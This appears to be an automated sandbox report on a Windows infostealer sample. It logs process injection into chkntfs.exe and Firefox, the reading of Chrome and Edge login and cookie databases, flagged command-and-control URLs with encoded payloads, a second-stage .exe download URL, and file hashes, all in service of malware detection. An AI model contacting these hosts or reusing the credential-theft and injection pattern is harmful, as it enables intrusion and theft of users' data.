Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Memory written: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Memory written: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Windows Analysis Report 8hd98EhtIFcYkb8.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
8hd98EhtIFcYkb8.exe

Malware Threat Intel
Provided by

Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Queries volume information: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkntfs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
162.0.238.43	www.tufftiff.xyz	Canada	22612	NAMECHEAP-NETUS	true
43.198.80.127	botokkkd4.top	Japan	4249	LILLY-ASUS	true
46.30.215.51	www.vivaepicmarbella.com	Denmark	51468	ONECOMDK	true
217.160.0.31	www.erhaltungsmassage.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
84.32.84.32	xn--gotopia-bya.com	Lithuania	33922	NTT-LT-ASLT	false
91.195.240.123	www.ridcoredry.live	Germany	47846	SEDO-ASDE	true
172.67.194.145	www.foryourhealth19.com	United States	13335	CLOUDFLARENETUS	true
74.208.236.162	www.lookstudiov.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
192.250.231.28	www.cr-pos.com	United States	36454	CNSV-LLCUS	true
185.234.72.101	unknown	United Kingdom	30823	COMBAHTONcombahtonGmbHDE	false
38.55.194.30	www.86wqi.cyou	United States	174	COGENT-174US	true
45.130.41.249	www.cvt-auto.ru	Russian Federation	198610	BEGET-ASRU	true
38.207.19.49	www.filmbrute.com	United States	9009	M247GB	true

Name	Malicious	Antivirus Detection	Reputation
http://www.foryourhealth19.com/ym7q/	true	Avira URL Cloud: malware	unknown
http://www.tufftiff.xyz/vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50	true	Avira URL Cloud: safe	unknown
http://www.vivaepicmarbella.com/e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50	true	Avira URL Cloud: safe	unknown
http://www.86wqi.cyou/80eg/	true	Avira URL Cloud: safe	unknown
http://www.erhaltungsmassage.com/ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp	true	Avira URL Cloud: safe	unknown
http://www.lookstudiov.com/u4jq/	true	Avira URL Cloud: safe	unknown
http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv	true	Avira URL Cloud: phishing	unknown
http://www.vivaepicmarbella.com/e5cg/	true	Avira URL Cloud: safe	unknown
http://www.tufftiff.xyz/vwgn/	true	Avira URL Cloud: safe	unknown
http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf	true	Avira URL Cloud: malware	unknown
http://www.ridcoredry.live/blq3/	true	Avira URL Cloud: phishing	unknown
http://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50	true	Avira URL Cloud: safe	unknown
http://www.botokkkd4.top/i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO	true	Avira URL Cloud: safe	unknown
http://www.botokkkd4.top/i6sl/	true	Avira URL Cloud: safe	unknown
http://www.filmbrute.com/vgf2/	true	Avira URL Cloud: safe	unknown
http://www.86wqi.cyou/80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4	true	Avira URL Cloud: safe	unknown
http://www.cr-pos.com/b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50	true	Avira URL Cloud: safe	unknown
http://www.cr-pos.com/b9jt/	true	Avira URL Cloud: safe	unknown
http://www.cvt-auto.ru/1cpo/	true	Avira URL Cloud: safe	unknown
http://www.xn--gotopia-bya.com/ynea/	false	Avira URL Cloud: safe	unknown
http://185.234.72.101/EuOdzX7Ehz6t1H3.exe	false	Avira URL Cloud: safe	unknown

ID:	1465534
Product:	CloudBasic
Start time:	19:22:08
Start date:	01.07.2024
Sample:	8hd98EhtIFcYkb8.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	677b2d2d3a54e0c1d8e416b276093fb3
SHA1:	22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
SHA256:	c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8hd98EhtIFcYkb8.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aj34fjqh.exe.log	ASCII text, with CRLF line terminators	215B3562F83C4FB9BBB129D2F9E59ADA	0534A53F6F42ECA7E56EB02E328A2025254AC511	4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A000A790579BE8EDD044A668469EA33E	CA2DB74AAABF250A375010E9039CBAA85BFA0074	CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A000A790579BE8EDD044A668469EA33E	CA2DB74AAABF250A375010E9039CBAA85BFA0074	CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
C:\Users\user\AppData\Local\Temp\j77tfG6	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	9A809AD8B1FDDA60760BB6253358A1DB	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A